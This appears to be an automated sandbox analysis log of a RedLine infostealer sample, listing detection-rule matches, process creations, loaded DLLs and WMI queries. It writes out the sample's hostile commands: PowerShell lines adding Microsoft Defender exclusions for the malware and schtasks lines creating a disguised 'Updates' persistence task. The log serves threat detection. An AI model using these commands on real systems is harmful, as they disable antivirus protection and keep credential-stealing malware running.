                    Source: PZNfhfaj9O.exe, 00000000.00000002.1865981717.0000000002D51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs PZNfhfaj9O.exe
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1862161622.000000000105E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PZNfhfaj9O.exe
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs PZNfhfaj9O.exe
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PZNfhfaj9O.exe
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1870347095.00000000078F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PZNfhfaj9O.exe
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000003025000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PZNfhfaj9O.exe
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs PZNfhfaj9O.exe
                    Source: PZNfhfaj9O.exeBinary or memory string: OriginalFilenameDQOrL.exe< vs PZNfhfaj9O.exe
                    Source: PZNfhfaj9O.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.PZNfhfaj9O.exe.3e42720.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.PZNfhfaj9O.exe.3e42720.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.CiENBY.exe.3ef3958.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.CiENBY.exe.3ef3958.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.PZNfhfaj9O.exe.3e2a900.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.PZNfhfaj9O.exe.3e2a900.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.CiENBY.exe.3edbb38.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.CiENBY.exe.3edbb38.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 9.2.PZNfhfaj9O.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 9.2.PZNfhfaj9O.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.CiENBY.exe.3ef3958.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.CiENBY.exe.3ef3958.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.CiENBY.exe.3edbb38.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.CiENBY.exe.3edbb38.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.PZNfhfaj9O.exe.3e42720.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.PZNfhfaj9O.exe.3e42720.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.PZNfhfaj9O.exe.3e2a900.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.PZNfhfaj9O.exe.3e2a900.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: PZNfhfaj9O.exe PID: 7148, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: PZNfhfaj9O.exe PID: 7204, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: CiENBY.exe PID: 7296, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: PZNfhfaj9O.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: CiENBY.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, RxRdm1nit3hOoWDSgZ.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, RxRdm1nit3hOoWDSgZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, RxRdm1nit3hOoWDSgZ.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, C5c8K7mA0nZqCckpt9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, RxRdm1nit3hOoWDSgZ.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, RxRdm1nit3hOoWDSgZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, RxRdm1nit3hOoWDSgZ.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, C5c8K7mA0nZqCckpt9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/99@2/1
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile created: C:\Users\user\AppData\Roaming\CiENBY.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5772:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3328:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeMutant created: \Sessions\1\BaseNamedObjects\EscmGzfpPEulDcYOXWoJYSO
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3010.tmpJump to behavior
                    Source: PZNfhfaj9O.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: PZNfhfaj9O.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.000000000315A000.00000004.00000800.00020000.00000000.sdmp, PZNfhfaj9O.exe, 00000009.00000002.1975298411.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000003459000.00000004.00000800.00020000.00000000.sdmp, tmp5CAB.tmp.9.dr, tmp6F9C.tmp.18.dr, tmp5C7B.tmp.9.dr, tmp6F79.tmp.18.dr, tmp6F9D.tmp.18.dr, tmp6F8B.tmp.18.dr, tmp6F8A.tmp.18.dr, tmp2665.tmp.9.dr, tmp5CBD.tmp.9.dr, tmp5C7A.tmp.9.dr, tmp6FAD.tmp.18.dr, tmp5CAC.tmp.9.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: PZNfhfaj9O.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile read: C:\Users\user\Desktop\PZNfhfaj9O.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\PZNfhfaj9O.exe "C:\Users\user\Desktop\PZNfhfaj9O.exe"
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\CiENBY.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Users\user\Desktop\PZNfhfaj9O.exe "C:\Users\user\Desktop\PZNfhfaj9O.exe"
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Users\user\Desktop\PZNfhfaj9O.exe "C:\Users\user\Desktop\PZNfhfaj9O.exe"
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\CiENBY.exe C:\Users\user\AppData\Roaming\CiENBY.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp5461.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess created: C:\Users\user\AppData\Roaming\CiENBY.exe "C:\Users\user\AppData\Roaming\CiENBY.exe"
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\CiENBY.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Users\user\Desktop\PZNfhfaj9O.exe "C:\Users\user\Desktop\PZNfhfaj9O.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Users\user\Desktop\PZNfhfaj9O.exe "C:\Users\user\Desktop\PZNfhfaj9O.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp5461.tmp"
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess created: C:\Users\user\AppData\Roaming\CiENBY.exe "C:\Users\user\AppData\Roaming\CiENBY.exe"
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
